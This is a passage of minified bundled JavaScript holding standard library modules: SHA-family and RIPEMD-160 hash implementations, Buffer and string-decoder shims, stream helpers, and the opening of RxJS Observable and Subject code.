U=0|this._a,K=0|this._b,ee=0|this._c,se=0|this._d,ve=0|this._e,le=0|this._a,ye=0|this._b,z=0|this._c,l=0|this._d,f=0|this._e,A=0;A<80;A+=1){var v,P;A<16?(v=M(U,K,ee,se,ve,S[I[A]],g[0],F[A]),P=x(le,ye,z,l,f,S[Q[A]],b[0],E[A])):A<32?(v=p(U,K,ee,se,ve,S[I[A]],g[1],F[A]),P=w(le,ye,z,l,f,S[Q[A]],b[1],E[A])):A<48?(v=D(U,K,ee,se,ve,S[I[A]],g[2],F[A]),P=D(le,ye,z,l,f,S[Q[A]],b[2],E[A])):A<64?(v=w(U,K,ee,se,ve,S[I[A]],g[3],F[A]),P=p(le,ye,z,l,f,S[Q[A]],b[3],E[A])):(v=x(U,K,ee,se,ve,S[I[A]],g[4],F[A]),P=M(le,ye,z,l,f,S[Q[A]],b[4],E[A])),U=ve,ve=se,se=y(ee,10),ee=K,K=v,le=f,f=l,l=y(z,10),z=ye,ye=P}var G=this._b+ee+l|0;this._b=this._c+se+f|0,this._c=this._d+ve+le|0,this._d=this._e+U+ye|0,this._e=this._a+K+z|0,this._a=G},_.prototype._digest=function(){this._block[this._blockOffset++]=128,this._blockOffset>56&&(this._block.fill(0,this._blockOffset,64),this._update(),this._blockOffset=0),this._block.fill(0,this._blockOffset,56),this._block.writeUInt32LE(this._length[0],56),this._block.writeUInt32LE(this._length[1],60),this._update();var S=ie.alloc?ie.alloc(20):new ie(20);return S.writeInt32LE(this._a,0),S.writeInt32LE(this._b,4),S.writeInt32LE(this._c,8),S.writeInt32LE(this._d,12),S.writeInt32LE(this._e,16),S},Pe.exports=_},265:(Pe,we,de)=>{var ie=de(5449),j=ie.Buffer;function $(I,Q){for(var F in I)Q[F]=I[F]}function ae(I,Q,F){return j(I,Q,F)}j.from&&j.alloc&&j.allocUnsafe&&j.allocUnsafeSlow?Pe.exports=ie:($(ie,we),we.Buffer=ae),ae.prototype=Object.create(j.prototype),$(j,ae),ae.from=function(I,Q,F){if("number"==typeof I)throw new TypeError("Argument must not be a number");return j(I,Q,F)},ae.alloc=function(I,Q,F){if("number"!=typeof I)throw new TypeError("Argument must be a number");var E=j(I);return void 0!==Q?"string"==typeof F?E.fill(Q,F):E.fill(Q):E.fill(0),E},ae.allocUnsafe=function(I){if("number"!=typeof I)throw new TypeError("Argument must be a number");return j(I)},ae.allocUnsafeSlow=function(I){if("number"!=typeof I)throw new TypeError("Argument must be a number");return ie.SlowBuffer(I)}},9173:(Pe,we,de)=>{"use strict";var I,ie=de(5486),j=de(5449),$=j.Buffer,ae={};for(I in j)!j.hasOwnProperty(I)||"SlowBuffer"===I||"Buffer"===I||(ae[I]=j[I]);var Q=ae.Buffer={};for(I in $)!$.hasOwnProperty(I)||"allocUnsafe"===I||"allocUnsafeSlow"===I||(Q[I]=$[I]);if(ae.Buffer.prototype=$.prototype,(!Q.from||Q.from===Uint8Array.from)&&(Q.from=function(F,E,g){if("number"==typeof F)throw new TypeError('The "value" argument must not be of type number. Received type '+typeof F);if(F&&void 0===F.length)throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof F);return $(F,E,g)}),Q.alloc||(Q.alloc=function(F,E,g){if("number"!=typeof F)throw new TypeError('The "size" argument must be of type number. Received type '+typeof F);if(F<0||F>=2*(1<<30))throw new RangeError('The value "'+F+'" is invalid for option "size"');var b=$(F);return E&&0!==E.length?"string"==typeof g?b.fill(E,g):b.fill(E):b.fill(0),b}),!ae.kStringMaxLength)try{ae.kStringMaxLength=ie.binding("buffer").kStringMaxLength}catch(F){}ae.constants||(ae.constants={MAX_LENGTH:ae.kMaxLength},ae.kStringMaxLength&&(ae.constants.MAX_STRING_LENGTH=ae.kStringMaxLength)),Pe.exports=ae},7500:(Pe,we,de)=>{var ie=de(265).Buffer;function j($,ae){this._block=ie.alloc($),this._finalSize=ae,this._blockSize=$,this._len=0}j.prototype.update=function($,ae){"string"==typeof $&&($=ie.from($,ae=ae||"utf8"));for(var I=this._block,Q=this._blockSize,F=$.length,E=this._len,g=0;g<F;){for(var b=E%Q,_=Math.min(F-g,Q-b),y=0;y<_;y++)I[b+y]=$[g+y];g+=_,(E+=_)%Q==0&&this._update(I)}return this._len+=F,this},j.prototype.digest=function($){var ae=this._len%this._blockSize;this._block[ae]=128,this._block.fill(0,ae+1),ae>=this._finalSize&&(this._update(this._block),this._block.fill(0));var I=8*this._len;if(I<=4294967295)this._block.writeUInt32BE(I,this._blockSize-4);else{var Q=(4294967295&I)>>>0;this._block.writeUInt32BE((I-Q)/4294967296,this._blockSize-8),this._block.writeUInt32BE(Q,this._blockSize-4)}this._update(this._block);var E=this._hash();return $?E.toString($):E},j.prototype._update=function(){throw new Error("_update must be implemented by subclass")},Pe.exports=j},6890:(Pe,we,de)=>{var ie=Pe.exports=function($){$=$.toLowerCase();var ae=ie[$];if(!ae)throw new Error($+" is not supported (we accept pull requests)");return new ae};ie.sha=de(3142),ie.sha1=de(2385),ie.sha224=de(3974),ie.sha256=de(5757),ie.sha384=de(9241),ie.sha512=de(3190)},3142:(Pe,we,de)=>{var ie=de(2270),j=de(7500),$=de(265).Buffer,ae=[1518500249,1859775393,-1894007588,-899497514],I=new Array(80);function Q(){this.init(),this._w=I,j.call(this,64,56)}function F(b){return b<<5|b>>>27}function E(b){return b<<30|b>>>2}function g(b,_,y,M){return 0===b?_&y|~_&M:2===b?_&y|_&M|y&M:_^y^M}ie(Q,j),Q.prototype.init=function(){return this._a=1732584193,this._b=4023233417,this._c=2562383102,this._d=271733878,this._e=3285377520,this},Q.prototype._update=function(b){for(var _=this._w,y=0|this._a,M=0|this._b,p=0|this._c,D=0|this._d,w=0|this._e,x=0;x<16;++x)_[x]=b.readInt32BE(4*x);for(;x<80;++x)_[x]=_[x-3]^_[x-8]^_[x-14]^_[x-16];for(var S=0;S<80;++S){var O=~~(S/20),U=F(y)+g(O,M,p,D)+w+_[S]+ae[O]|0;w=D,D=p,p=E(M),M=y,y=U}this._a=y+this._a|0,this._b=M+this._b|0,this._c=p+this._c|0,this._d=D+this._d|0,this._e=w+this._e|0},Q.prototype._hash=function(){var b=$.allocUnsafe(20);return b.writeInt32BE(0|this._a,0),b.writeInt32BE(0|this._b,4),b.writeInt32BE(0|this._c,8),b.writeInt32BE(0|this._d,12),b.writeInt32BE(0|this._e,16),b},Pe.exports=Q},2385:(Pe,we,de)=>{var ie=de(2270),j=de(7500),$=de(265).Buffer,ae=[1518500249,1859775393,-1894007588,-899497514],I=new Array(80);function Q(){this.init(),this._w=I,j.call(this,64,56)}function F(_){return _<<1|_>>>31}function E(_){return _<<5|_>>>27}function g(_){return _<<30|_>>>2}function b(_,y,M,p){return 0===_?y&M|~y&p:2===_?y&M|y&p|M&p:y^M^p}ie(Q,j),Q.prototype.init=function(){return this._a=1732584193,this._b=4023233417,this._c=2562383102,this._d=271733878,this._e=3285377520,this},Q.prototype._update=function(_){for(var y=this._w,M=0|this._a,p=0|this._b,D=0|this._c,w=0|this._d,x=0|this._e,S=0;S<16;++S)y[S]=_.readInt32BE(4*S);for(;S<80;++S)y[S]=F(y[S-3]^y[S-8]^y[S-14]^y[S-16]);for(var O=0;O<80;++O){var U=~~(O/20),K=E(M)+b(U,p,D,w)+x+y[O]+ae[U]|0;x=w,w=D,D=g(p),p=M,M=K}this._a=M+this._a|0,this._b=p+this._b|0,this._c=D+this._c|0,this._d=w+this._d|0,this._e=x+this._e|0},Q.prototype._hash=function(){var _=$.allocUnsafe(20);return _.writeInt32BE(0|this._a,0),_.writeInt32BE(0|this._b,4),_.writeInt32BE(0|this._c,8),_.writeInt32BE(0|this._d,12),_.writeInt32BE(0|this._e,16),_},Pe.exports=Q},3974:(Pe,we,de)=>{var ie=de(2270),j=de(5757),$=de(7500),ae=de(265).Buffer,I=new Array(64);function Q(){this.init(),this._w=I,$.call(this,64,56)}ie(Q,j),Q.prototype.init=function(){return this._a=3238371032,this._b=914150663,this._c=812702999,this._d=4144912697,this._e=4290775857,this._f=1750603025,this._g=1694076839,this._h=3204075428,this},Q.prototype._hash=function(){var F=ae.allocUnsafe(28);return F.writeInt32BE(this._a,0),F.writeInt32BE(this._b,4),F.writeInt32BE(this._c,8),F.writeInt32BE(this._d,12),F.writeInt32BE(this._e,16),F.writeInt32BE(this._f,20),F.writeInt32BE(this._g,24),F},Pe.exports=Q},5757:(Pe,we,de)=>{var ie=de(2270),j=de(7500),$=de(265).Buffer,ae=[1116352408,1899447441,3049323471,3921009573,961987163,1508970993,2453635748,2870763221,3624381080,310598401,607225278,1426881987,1925078388,2162078206,2614888103,3248222580,3835390401,4022224774,264347078,604807628,770255983,1249150122,1555081692,1996064986,2554220882,2821834349,2952996808,3210313671,3336571891,3584528711,113926993,338241895,666307205,773529912,1294757372,1396182291,1695183700,1986661051,2177026350,2456956037,2730485921,2820302411,3259730800,3345764771,3516065817,3600352804,4094571909,275423344,430227734,506948616,659060556,883997877,958139571,1322822218,1537002063,1747873779,1955562222,2024104815,2227730452,2361852424,2428436474,2756734187,3204031479,3329325298],I=new Array(64);function Q(){this.init(),this._w=I,j.call(this,64,56)}function F(M,p,D){return D^M&(p^D)}function E(M,p,D){return M&p|D&(M|p)}function g(M){return(M>>>2|M<<30)^(M>>>13|M<<19)^(M>>>22|M<<10)}function b(M){return(M>>>6|M<<26)^(M>>>11|M<<21)^(M>>>25|M<<7)}function _(M){return(M>>>7|M<<25)^(M>>>18|M<<14)^M>>>3}function y(M){return(M>>>17|M<<15)^(M>>>19|M<<13)^M>>>10}ie(Q,j),Q.prototype.init=function(){return this._a=1779033703,this._b=3144134277,this._c=1013904242,this._d=2773480762,this._e=1359893119,this._f=2600822924,this._g=528734635,this._h=1541459225,this},Q.prototype._update=function(M){for(var p=this._w,D=0|this._a,w=0|this._b,x=0|this._c,S=0|this._d,O=0|this._e,U=0|this._f,K=0|this._g,ee=0|this._h,se=0;se<16;++se)p[se]=M.readInt32BE(4*se);for(;se<64;++se)p[se]=y(p[se-2])+p[se-7]+_(p[se-15])+p[se-16]|0;for(var ve=0;ve<64;++ve){var le=ee+b(O)+F(O,U,K)+ae[ve]+p[ve]|0,ye=g(D)+E(D,w,x)|0;ee=K,K=U,U=O,O=S+le|0,S=x,x=w,w=D,D=le+ye|0}this._a=D+this._a|0,this._b=w+this._b|0,this._c=x+this._c|0,this._d=S+this._d|0,this._e=O+this._e|0,this._f=U+this._f|0,this._g=K+this._g|0,this._h=ee+this._h|0},Q.prototype._hash=function(){var M=$.allocUnsafe(32);return M.writeInt32BE(this._a,0),M.writeInt32BE(this._b,4),M.writeInt32BE(this._c,8),M.writeInt32BE(this._d,12),M.writeInt32BE(this._e,16),M.writeInt32BE(this._f,20),M.writeInt32BE(this._g,24),M.writeInt32BE(this._h,28),M},Pe.exports=Q},9241:(Pe,we,de)=>{var ie=de(2270),j=de(3190),$=de(7500),ae=de(265).Buffer,I=new Array(160);function Q(){this.init(),this._w=I,$.call(this,128,112)}ie(Q,j),Q.prototype.init=function(){return this._ah=3418070365,this._bh=1654270250,this._ch=2438529370,this._dh=355462360,this._eh=1731405415,this._fh=2394180231,this._gh=3675008525,this._hh=1203062813,this._al=3238371032,this._bl=914150663,this._cl=812702999,this._dl=4144912697,this._el=4290775857,this._fl=1750603025,this._gl=1694076839,this._hl=3204075428,this},Q.prototype._hash=function(){var F=ae.allocUnsafe(48);function E(g,b,_){F.writeInt32BE(g,_),F.writeInt32BE(b,_+4)}return E(this._ah,this._al,0),E(this._bh,this._bl,8),E(this._ch,this._cl,16),E(this._dh,this._dl,24),E(this._eh,this._el,32),E(this._fh,this._fl,40),F},Pe.exports=Q},3190:(Pe,we,de)=>{var ie=de(2270),j=de(7500),$=de(265).Buffer,ae=[1116352408,3609767458,1899447441,602891725,3049323471,3964484399,3921009573,2173295548,961987163,4081628472,1508970993,3053834265,2453635748,2937671579,2870763221,3664609560,3624381080,2734883394,310598401,1164996542,607225278,1323610764,1426881987,3590304994,1925078388,4068182383,2162078206,991336113,2614888103,633803317,3248222580,3479774868,3835390401,2666613458,4022224774,944711139,264347078,2341262773,604807628,2007800933,770255983,1495990901,1249150122,1856431235,1555081692,3175218132,1996064986,2198950837,2554220882,3999719339,2821834349,766784016,2952996808,2566594879,3210313671,3203337956,3336571891,1034457026,3584528711,2466948901,113926993,3758326383,338241895,168717936,666307205,1188179964,773529912,1546045734,1294757372,1522805485,1396182291,2643833823,1695183700,2343527390,1986661051,1014477480,2177026350,1206759142,2456956037,344077627,2730485921,1290863460,2820302411,3158454273,3259730800,3505952657,3345764771,106217008,3516065817,3606008344,3600352804,1432725776,4094571909,1467031594,275423344,851169720,430227734,3100823752,506948616,1363258195,659060556,3750685593,883997877,3785050280,958139571,3318307427,1322822218,3812723403,1537002063,2003034995,1747873779,3602036899,1955562222,1575990012,2024104815,1125592928,2227730452,2716904306,2361852424,442776044,2428436474,593698344,2756734187,3733110249,3204031479,2999351573,3329325298,3815920427,3391569614,3928383900,3515267271,566280711,3940187606,3454069534,4118630271,4000239992,116418474,1914138554,174292421,2731055270,289380356,3203993006,460393269,320620315,685471733,587496836,852142971,1086792851,1017036298,365543100,1126000580,2618297676,1288033470,3409855158,1501505948,4234509866,1607167915,987167468,1816402316,1246189591],I=new Array(160);function Q(){this.init(),this._w=I,j.call(this,128,112)}function F(w,x,S){return S^w&(x^S)}function E(w,x,S){return w&x|S&(w|x)}function g(w,x){return(w>>>28|x<<4)^(x>>>2|w<<30)^(x>>>7|w<<25)}function b(w,x){return(w>>>14|x<<18)^(w>>>18|x<<14)^(x>>>9|w<<23)}function _(w,x){return(w>>>1|x<<31)^(w>>>8|x<<24)^w>>>7}function y(w,x){return(w>>>1|x<<31)^(w>>>8|x<<24)^(w>>>7|x<<25)}function M(w,x){return(w>>>19|x<<13)^(x>>>29|w<<3)^w>>>6}function p(w,x){return(w>>>19|x<<13)^(x>>>29|w<<3)^(w>>>6|x<<26)}function D(w,x){return w>>>0<x>>>0?1:0}ie(Q,j),Q.prototype.init=function(){return this._ah=1779033703,this._bh=3144134277,this._ch=1013904242,this._dh=2773480762,this._eh=1359893119,this._fh=2600822924,this._gh=528734635,this._hh=1541459225,this._al=4089235720,this._bl=2227873595,this._cl=4271175723,this._dl=1595750129,this._el=2917565137,this._fl=725511199,this._gl=4215389547,this._hl=327033209,this},Q.prototype._update=function(w){for(var x=this._w,S=0|this._ah,O=0|this._bh,U=0|this._ch,K=0|this._dh,ee=0|this._eh,se=0|this._fh,ve=0|this._gh,le=0|this._hh,ye=0|this._al,z=0|this._bl,l=0|this._cl,f=0|this._dl,A=0|this._el,v=0|this._fl,P=0|this._gl,G=0|this._hl,X=0;X<32;X+=2)x[X]=w.readInt32BE(4*X),x[X+1]=w.readInt32BE(4*X+4);for(;X<160;X+=2){var L=x[X-30],h=x[X-30+1],R=_(L,h),J=y(h,L),Z=M(L=x[X-4],h=x[X-4+1]),ue=p(h,L),Ue=x[X-32],Xe=x[X-32+1],He=J+x[X-14+1]|0,Be=R+x[X-14]+D(He,J)|0;Be=(Be=Be+Z+D(He=He+ue|0,ue)|0)+Ue+D(He=He+Xe|0,Xe)|0,x[X]=Be,x[X+1]=He}for(var qe=0;qe<160;qe+=2){Be=x[qe],He=x[qe+1];var De=E(S,O,U),Ve=E(ye,z,l),ze=g(S,ye),me=g(ye,S),Ke=b(ee,A),rt=b(A,ee),Ge=ae[qe],Qe=ae[qe+1],ht=F(ee,se,ve),mt=F(A,v,P),lt=G+rt|0,ft=le+Ke+D(lt,G)|0;ft=(ft=(ft=ft+ht+D(lt=lt+mt|0,mt)|0)+Ge+D(lt=lt+Qe|0,Qe)|0)+Be+D(lt=lt+He|0,He)|0;var xe=me+Ve|0,We=ze+De+D(xe,me)|0;le=ve,G=P,ve=se,P=v,se=ee,v=A,ee=K+ft+D(A=f+lt|0,f)|0,K=U,f=l,U=O,l=z,O=S,z=ye,S=ft+We+D(ye=lt+xe|0,lt)|0}this._al=this._al+ye|0,this._bl=this._bl+z|0,this._cl=this._cl+l|0,this._dl=this._dl+f|0,this._el=this._el+A|0,this._fl=this._fl+v|0,this._gl=this._gl+P|0,this._hl=this._hl+G|0,this._ah=this._ah+S+D(this._al,ye)|0,this._bh=this._bh+O+D(this._bl,z)|0,this._ch=this._ch+U+D(this._cl,l)|0,this._dh=this._dh+K+D(this._dl,f)|0,this._eh=this._eh+ee+D(this._el,A)|0,this._fh=this._fh+se+D(this._fl,v)|0,this._gh=this._gh+ve+D(this._gl,P)|0,this._hh=this._hh+le+D(this._hl,G)|0},Q.prototype._hash=function(){var w=$.allocUnsafe(64);function x(S,O,U){w.writeInt32BE(S,U),w.writeInt32BE(O,U+4)}return x(this._ah,this._al,0),x(this._bh,this._bl,8),x(this._ch,this._cl,16),x(this._dh,this._dl,24),x(this._eh,this._el,32),x(this._fh,this._fl,40),x(this._gh,this._gl,48),x(this._hh,this._hl,56),w},Pe.exports=Q},7856:(Pe,we,de)=>{"use strict";var ie=de(5449).Buffer;const j=Symbol.prototype.valueOf,$=de(7374);Pe.exports=function ae(b,_){switch($(b)){case"array":return b.slice();case"object":return Object.assign({},b);case"date":return new b.constructor(Number(b));case"map":return new Map(b);case"set":return new Set(b);case"buffer":return function E(b){const _=b.length,y=ie.allocUnsafe?ie.allocUnsafe(_):ie.from(_);return b.copy(y),y}(b);case"symbol":return function g(b){return j?Object(j.call(b)):{}}(b);case"arraybuffer":return function Q(b){const _=new b.constructor(b.byteLength);return new Uint8Array(_).set(new Uint8Array(b)),_}(b);case"float32array":case"float64array":case"int16array":case"int32array":case"int8array":case"uint16array":case"uint32array":case"uint8clampedarray":case"uint8array":return function F(b,_){return new b.constructor(b.buffer,b.byteOffset,b.length)}(b);case"regexp":return function I(b){const _=void 0!==b.flags?b.flags:/\w+$/.exec(b)||void 0,y=new b.constructor(b.source,_);return y.lastIndex=b.lastIndex,y}(b);case"error":return Object.create(b);default:return b}}},4893:(Pe,we,de)=>{Pe.exports=$;var ie=de(8227).EventEmitter;function $(){ie.call(this)}de(2270)($,ie),$.Readable=de(5455),$.Writable=de(2481),$.Duplex=de(5157),$.Transform=de(3148),$.PassThrough=de(8743),$.finished=de(1341),$.pipeline=de(6157),$.Stream=$,$.prototype.pipe=function(ae,I){var Q=this;function F(p){ae.writable&&!1===ae.write(p)&&Q.pause&&Q.pause()}function E(){Q.readable&&Q.resume&&Q.resume()}Q.on("data",F),ae.on("drain",E),!ae._isStdio&&(!I||!1!==I.end)&&(Q.on("end",b),Q.on("close",_));var g=!1;function b(){g||(g=!0,ae.end())}function _(){g||(g=!0,"function"==typeof ae.destroy&&ae.destroy())}function y(p){if(M(),0===ie.listenerCount(this,"error"))throw p}function M(){Q.removeListener("data",F),ae.removeListener("drain",E),Q.removeListener("end",b),Q.removeListener("close",_),Q.removeListener("error",y),ae.removeListener("error",y),Q.removeListener("end",M),Q.removeListener("close",M),ae.removeListener("close",M)}return Q.on("error",y),ae.on("error",y),Q.on("end",M),Q.on("close",M),ae.on("close",M),ae.emit("pipe",Q),ae}},5741:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=ie.isEncoding||function(S){switch((S=""+S)&&S.toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"binary":case"base64":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":case"raw":return!0;default:return!1}};function I(S){var O;switch(this.encoding=function ae(S){var O=function $(S){if(!S)return"utf8";for(var O;;)switch(S){case"utf8":case"utf-8":return"utf8";case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return"utf16le";case"latin1":case"binary":return"latin1";case"base64":case"ascii":case"hex":return S;default:if(O)return;S=(""+S).toLowerCase(),O=!0}}(S);if("string"!=typeof O&&(ie.isEncoding===j||!j(S)))throw new Error("Unknown encoding: "+S);return O||S}(S),this.encoding){case"utf16le":this.text=y,this.end=M,O=4;break;case"utf8":this.fillLast=g,O=4;break;case"base64":this.text=p,this.end=D,O=3;break;default:return this.write=w,void(this.end=x)}this.lastNeed=0,this.lastTotal=0,this.lastChar=ie.allocUnsafe(O)}function Q(S){return S<=127?0:S>>5==6?2:S>>4==14?3:S>>3==30?4:S>>6==2?-1:-2}function g(S){var O=this.lastTotal-this.lastNeed,U=function E(S,O,U){if(128!=(192&O[0]))return S.lastNeed=0,"\ufffd";if(S.lastNeed>1&&O.length>1){if(128!=(192&O[1]))return S.lastNeed=1,"\ufffd";if(S.lastNeed>2&&O.length>2&&128!=(192&O[2]))return S.lastNeed=2,"\ufffd"}}(this,S);return void 0!==U?U:this.lastNeed<=S.length?(S.copy(this.lastChar,O,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal)):(S.copy(this.lastChar,O,0,S.length),void(this.lastNeed-=S.length))}function y(S,O){if((S.length-O)%2==0){var U=S.toString("utf16le",O);if(U){var K=U.charCodeAt(U.length-1);if(K>=55296&&K<=56319)return this.lastNeed=2,this.lastTotal=4,this.lastChar[0]=S[S.length-2],this.lastChar[1]=S[S.length-1],U.slice(0,-1)}return U}return this.lastNeed=1,this.lastTotal=2,this.lastChar[0]=S[S.length-1],S.toString("utf16le",O,S.length-1)}function M(S){var O=S&&S.length?this.write(S):"";return this.lastNeed?O+this.lastChar.toString("utf16le",0,this.lastTotal-this.lastNeed):O}function p(S,O){var U=(S.length-O)%3;return 0===U?S.toString("base64",O):(this.lastNeed=3-U,this.lastTotal=3,1===U?this.lastChar[0]=S[S.length-1]:(this.lastChar[0]=S[S.length-2],this.lastChar[1]=S[S.length-1]),S.toString("base64",O,S.length-U))}function D(S){var O=S&&S.length?this.write(S):"";return this.lastNeed?O+this.lastChar.toString("base64",0,3-this.lastNeed):O}function w(S){return S.toString(this.encoding)}function x(S){return S&&S.length?this.write(S):""}we.s=I,I.prototype.write=function(S){if(0===S.length)return"";var O,U;if(this.lastNeed){if(void 0===(O=this.fillLast(S)))return"";U=this.lastNeed,this.lastNeed=0}else U=0;return U<S.length?O?O+this.text(S,U):this.text(S,U):O||""},I.prototype.end=function _(S){var O=S&&S.length?this.write(S):"";return this.lastNeed?O+"\ufffd":O},I.prototype.text=function b(S,O){var U=function F(S,O,U){var K=O.length-1;if(K<U)return 0;var ee=Q(O[K]);return ee>=0?(ee>0&&(S.lastNeed=ee-1),ee):--K<U||-2===ee?0:(ee=Q(O[K]))>=0?(ee>0&&(S.lastNeed=ee-2),ee):--K<U||-2===ee?0:(ee=Q(O[K]))>=0?(ee>0&&(2===ee?ee=0:S.lastNeed=ee-3),ee):0}(this,S,O);if(!this.lastNeed)return S.toString("utf8",O);this.lastTotal=U;var K=S.length-(U-this.lastNeed);return S.copy(this.lastChar,0,K),S.toString("utf8",O,K)},I.prototype.fillLast=function(S){if(this.lastNeed<=S.length)return S.copy(this.lastChar,this.lastTotal-this.lastNeed,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal);S.copy(this.lastChar,this.lastTotal-this.lastNeed,0,S.length),this.lastNeed-=S.length}},7226:Pe=>{function de(ie){try{if(!global.localStorage)return!1}catch($){return!1}var j=global.localStorage[ie];return null!=j&&"true"===String(j).toLowerCase()}Pe.exports=function we(ie,j){if(de("noDeprecation"))return ie;var $=!1;return function ae(){if(!$){if(de("throwDeprecation"))throw new Error(j);de("traceDeprecation")?console.trace(j):console.warn(j),$=!0}return ie.apply(this,arguments)}}},6854:Pe=>{Pe.exports=function we(de,ie){if(de&&ie)return we(de)(ie);if("function"!=typeof de)throw new TypeError("need wrapper function");return Object.keys(de).forEach(function($){j[$]=de[$]}),j;function j(){for(var $=new Array(arguments.length),ae=0;ae<$.length;ae++)$[ae]=arguments[ae];var I=de.apply(this,$),Q=$[$.length-1];return"function"==typeof I&&I!==Q&&Object.keys(Q).forEach(function(F){I[F]=Q[F]}),I}}},1613:(Pe,we,de)=>{"use strict";function ie(t){return"function"==typeof t}function j(t){const e=t(i=>{Error.call(i),i.stack=(new Error).stack});return e.prototype=Object.create(Error.prototype),e.prototype.constructor=e,e}const $=j(t=>function(e){t(this),this.message=e?`${e.length} errors occurred during unsubscription:\n${e.map((i,n)=>`${n+1}) ${i.toString()}`).join("\n  ")}`:"",this.name="UnsubscriptionError",this.errors=e});function ae(t,a){if(t){const e=t.indexOf(a);0<=e&&t.splice(e,1)}}class I{constructor(a){this.initialTeardown=a,this.closed=!1,this._parentage=null,this._finalizers=null}unsubscribe(){let a;if(!this.closed){this.closed=!0;const{_parentage:e}=this;if(e)if(this._parentage=null,Array.isArray(e))for(const r of e)r.remove(this);else e.remove(this);const{initialTeardown:i}=this;if(ie(i))try{i()}catch(r){a=r instanceof $?r.errors:[r]}const{_finalizers:n}=this;if(n){this._finalizers=null;for(const r of n)try{E(r)}catch(c){a=null!=a?a:[],c instanceof $?a=[...a,...c.errors]:a.push(c)}}if(a)throw new $(a)}}add(a){var e;if(a&&a!==this)if(this.closed)E(a);else{if(a instanceof I){if(a.closed||a._hasParent(this))return;a._addParent(this)}(this._finalizers=null!==(e=this._finalizers)&&void 0!==e?e:[]).push(a)}}_hasParent(a){const{_parentage:e}=this;return e===a||Array.isArray(e)&&e.includes(a)}_addParent(a){const{_parentage:e}=this;this._parentage=Array.isArray(e)?(e.push(a),e):e?[e,a]:a}_removeParent(a){const{_parentage:e}=this;e===a?this._parentage=null:Array.isArray(e)&&ae(e,a)}remove(a){const{_finalizers:e}=this;e&&ae(e,a),a instanceof I&&a._removeParent(this)}}I.EMPTY=(()=>{const t=new I;return t.closed=!0,t})();const Q=I.EMPTY;function F(t){return t instanceof I||t&&"closed"in t&&ie(t.remove)&&ie(t.add)&&ie(t.unsubscribe)}function E(t){ie(t)?t():t.unsubscribe()}const g={onUnhandledError:null,onStoppedNotification:null,Promise:void 0,useDeprecatedSynchronousErrorHandling:!1,useDeprecatedNextContext:!1},b={setTimeout(t,a,...e){const{delegate:i}=b;return null!=i&&i.setTimeout?i.setTimeout(t,a,...e):setTimeout(t,a,...e)},clearTimeout(t){const{delegate:a}=b;return((null==a?void 0:a.clearTimeout)||clearTimeout)(t)},delegate:void 0};function _(t){b.setTimeout(()=>{const{onUnhandledError:a}=g;if(!a)throw t;a(t)})}function y(){}const M=w("C",void 0,void 0);function w(t,a,e){return{kind:t,value:a,error:e}}let x=null;function S(t){if(g.useDeprecatedSynchronousErrorHandling){const a=!x;if(a&&(x={errorThrown:!1,error:null}),t(),a){const{errorThrown:e,error:i}=x;if(x=null,e)throw i}}else t()}class U extends I{constructor(a){super(),this.isStopped=!1,a?(this.destination=a,F(a)&&a.add(this)):this.destination=l}static create(a,e,i){return new ve(a,e,i)}next(a){this.isStopped?z(function D(t){return w("N",t,void 0)}(a),this):this._next(a)}error(a){this.isStopped?z(function p(t){return w("E",void 0,t)}(a),this):(this.isStopped=!0,this._error(a))}complete(){this.isStopped?z(M,this):(this.isStopped=!0,this._complete())}unsubscribe(){this.closed||(this.isStopped=!0,super.unsubscribe(),this.destination=null)}_next(a){this.destination.next(a)}_error(a){try{this.destination.error(a)}finally{this.unsubscribe()}}_complete(){try{this.destination.complete()}finally{this.unsubscribe()}}}const K=Function.prototype.bind;function ee(t,a){return K.call(t,a)}class se{constructor(a){this.partialObserver=a}next(a){const{partialObserver:e}=this;if(e.next)try{e.next(a)}catch(i){le(i)}}error(a){const{partialObserver:e}=this;if(e.error)try{e.error(a)}catch(i){le(i)}else le(a)}complete(){const{partialObserver:a}=this;if(a.complete)try{a.complete()}catch(e){le(e)}}}class ve extends U{constructor(a,e,i){let n;if(super(),ie(a)||!a)n={next:null!=a?a:void 0,error:null!=e?e:void 0,complete:null!=i?i:void 0};else{let r;this&&g.useDeprecatedNextContext?(r=Object.create(a),r.unsubscribe=()=>this.unsubscribe(),n={next:a.next&&ee(a.next,r),error:a.error&&ee(a.error,r),complete:a.complete&&ee(a.complete,r)}):n=a}this.destination=new se(n)}}function le(t){g.useDeprecatedSynchronousErrorHandling?function O(t){g.useDeprecatedSynchronousErrorHandling&&x&&(x.errorThrown=!0,x.error=t)}(t):_(t)}function z(t,a){const{onStoppedNotification:e}=g;e&&b.setTimeout(()=>e(t,a))}const l={closed:!0,next:y,error:function ye(t){throw t},complete:y},f="function"==typeof Symbol&&Symbol.observable||"@@observable";function A(t){return t}function P(t){return 0===t.length?A:1===t.length?t[0]:function(e){return t.reduce((i,n)=>n(i),e)}}let G=(()=>{class t{constructor(e){e&&(this._subscribe=e)}lift(e){const i=new t;return i.source=this,i.operator=e,i}subscribe(e,i,n){const r=function h(t){return t&&t instanceof U||function L(t){return t&&ie(t.next)&&ie(t.error)&&ie(t.complete)}(t)&&F(t)}(e)?e:new ve(e,i,n);return S(()=>{const{operator:c,source:d}=this;r.add(c?c.call(r,d):d?this._subscribe(r):this._trySubscribe(r))}),r}_trySubscribe(e){try{return this._subscribe(e)}catch(i){e.error(i)}}forEach(e,i){return new(i=X(i))((n,r)=>{const c=new ve({next:d=>{try{e(d)}catch(T){r(T),c.unsubscribe()}},error:r,complete:n});this.subscribe(c)})}_subscribe(e){var i;return null===(i=this.source)||void 0===i?void 0:i.subscribe(e)}[f](){return this}pipe(...e){return P(e)(this)}toPromise(e){return new(e=X(e))((i,n)=>{let r;this.subscribe(c=>r=c,c=>n(c),()=>i(r))})}}return t.create=a=>new t(a),t})();function X(t){var a;return null!==(a=null!=t?t:g.Promise)&&void 0!==a?a:Promise}const R=j(t=>function(){t(this),this.name="ObjectUnsubscribedError",this.message="object unsubscribed"});let J=(()=>{class t extends G{constructor(){super(),this.closed=!1,this.currentObservers=null,this.observers=[],this.isStopped=!1,this.hasError=!1,this.thrownError=null}lift(e){const i=new Z(this,this);return i.operator=e,i}_throwIfClosed(){if(this.closed)throw new 